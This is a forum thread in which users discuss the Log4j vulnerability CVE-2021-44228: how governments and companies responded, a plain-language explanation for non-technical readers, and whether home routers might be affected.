The CVE-2021-44228 vulnerability is serious because it’s being exploited already, allows arbitrary code execution, and the library in question may be present in any system that is (directly or indirectly) based on Java.
Here I’ve seen the governments of Canada and Québec take down all their websites; their respective home pages were back online soon after, with a message about most of their other online systems getting turned them back on progressively when they’re verified as secure. Of course, a government can afford to do this.
But I haven’t seen many businesses do the same. I suspect two of the financial institutions I do business with of using Java extensively in their Web-facing systems, yet they haven’t taken down their sites and haven’t even published anything saying “We’ve checked and we’re not affected”. Of course, a bank that took down its own website for more than a few hours would be at serious risk of losing customers. Their IT staff are probably checking their systems frantically nonetheless.
What have you seen as a response so far, in your areas ? Sites taken down, reassuring messages, etc. ?
Surprisingly little. I’ve had calls from a few clients to confirm that
A) we weren’t vulnerable and b) nothing we have done for them is affected.
We’re a 100% Microsoft shop, so no Java for us. I did have to update our network controller software, but the vendor had an updated version out on Friday.
Nvidia put out a notice on their security page (which I check to see if I need to update my drivers.) They simply say they’re investigating if they need to make any changes and will update as they do.
At my office, we started working on mitigating the problem this Saturday and although the systems that I work with were taken care of then (with a few minutes of down time) additional work continued until yesterday. I also should clarify that it is not all Java based systems, just the ones that use that particular library. It is widely used by webservers and the like, but just having Java on your system does not automatically mean you have Log4j.
Minecraft, servers and Java clients, do make use of it, so Minecraft users were notified over the weekend to upgrade both. They don’t control the servers that people have spun up on their own so they can’t do much on their end, other than provide a way to update for those.
Could someone please translate that into non-tech for us end users? I gather this is some sort of vulnerability, but I have no idea how this is relevant to me (other than !Danger, Will Robinson! alert that there is a security issue). What does the average (non-corporation) person need to know or do here?
There is a bug in a Java library that writes out logs. If the system is affected, you can put the exploit in a field in a web page that saves the entry for debugging and informational purposes. The component that handles the logging, log4j, unintentionally runs the code while trying to save the log bypassing any security that would normally be in place.
This only affects systems that a) don’t cleanse the input b) are running Java c) are using the affected versions of log4j. For example, my firewall runs Java but they are not using a vulnerable version of log4j.
If your home internet router has this issue and is accessible from the internet, it could be a big issue. If it is accessible only from your home, it’s a much smaller risk.
Our tech support is located in New Jersey or something. I’m sure they’re looking into it but unless they need protracted downtime to fix it we’ll never know what they might or might not need to do.
Well, basically, it’s a security hole that may affect server-based software and especially websites, if they are built using a certain set of tools and use some versions of a library called Log4j. Log4j is used for logging (writing technical logs about event sequences), and it costs nothing to use, so it’s included for troubleshooting purposes in many pieces of software. An attacker could execute code of their choosing, remotely, simply by putting in some specific text on a website form. Depending on the privilege level of the affected software, it may allow an attacker to install additional software, steal information, damage a website or a company’s corporate systems.
There isn’t much you can do as an ordinary citizen. It’s unlikely that the vulnerability would affect your phone or tablet, or even your PC or Mac.
ETA: Good point about the router, @FinsToTheLeft , I hadn’t thought about that. Yes, there is some danger in your home after all.
It’s more something your employer, your government, the companies you deal with, need to fix. You may be affected in various ways, as a direct or indirect user.
One non-technical analogy I’ve heard is that it’s like if someone sends you a postcard with a special message on it then all the doors in your house unlock.
The reaction for my team has been a scramble to pull a release that was set to go out the door so we could patch it, and plan for two patches on earlier release streams to deliver the fix there. Some long calls with all our affected developers to craft a new schedule, analyze the impact on our systems, and write an advisory for customers detailing how they can adjust their configuration to alleviate the threat.
Just Google [Router Manufacturer] [Model] Log4J, and see if your router manufacturer has published updated firmware. If so, you should see instructions to download and update the firmware.
Our minister of Government Digital Transformation (the computer guy at the government) said that inspecting government systems for this vulnerability is like doing an inventory of all 60-watt light bulbs in all government buildings.
Java is popular on routers and modems? That just seems so odd to me. The ones I’ve seen always seemed like they were running some version of Linux with a custom shell, with a very basic webserver. Running Java on top of that would seem inefficient.
Then again, the web interface to the modem of my new ISP does seem to be a lot slower than my old one, despite the device itself being a lot larger. It actually shows a loading page in between every page load, which seems odd for what should be a simple http server.
But I also can’t find anything related to Log4j about it. Just some security holes on old firmware versions.
Many basic (even appliance) web servers are written in Java. If you’re building your network appliance using open source components, Java may wind up in the mix.
Huh. Are they running Java natively, like old cell phones did? I’d think that native code would be needed for performance on such low end hardware (relative to PCs and phones).
Nope. Java runtime VMs are available for many of the SOC-type hardware that net appliances are now based on. Hardware performance has advanced quite a lot and Java runtimes are a little more efficient than they used to be.
And the JVM isn’t running the core firewall/router functions. That’s still native code in kernel or high-privilege userland.